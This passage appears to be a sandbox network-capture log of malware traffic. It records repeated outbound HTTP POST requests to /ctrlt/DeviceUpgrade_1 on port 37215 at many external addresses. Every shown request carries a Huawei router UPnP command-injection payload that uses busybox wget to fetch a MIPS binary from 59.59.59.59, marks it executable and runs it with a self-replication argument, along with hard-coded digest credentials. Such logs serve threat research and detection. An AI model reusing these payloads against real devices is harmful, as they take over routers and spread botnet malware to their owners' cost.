                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1451192.168.2.1551008157.47.226.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.861479044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1452192.168.2.153458641.156.249.18537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.861778975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1453192.168.2.1539808197.171.3.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.861793041 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1454192.168.2.1541346138.75.253.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.861898899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1455192.168.2.1547378101.155.156.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.862113953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1456192.168.2.1550230157.42.35.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.862142086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1457192.168.2.1548616197.226.54.5037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.862158060 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1458192.168.2.154727841.163.66.12337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.866242886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1459192.168.2.1539442197.156.208.21237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.866695881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1460192.168.2.1546044197.67.162.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.866720915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
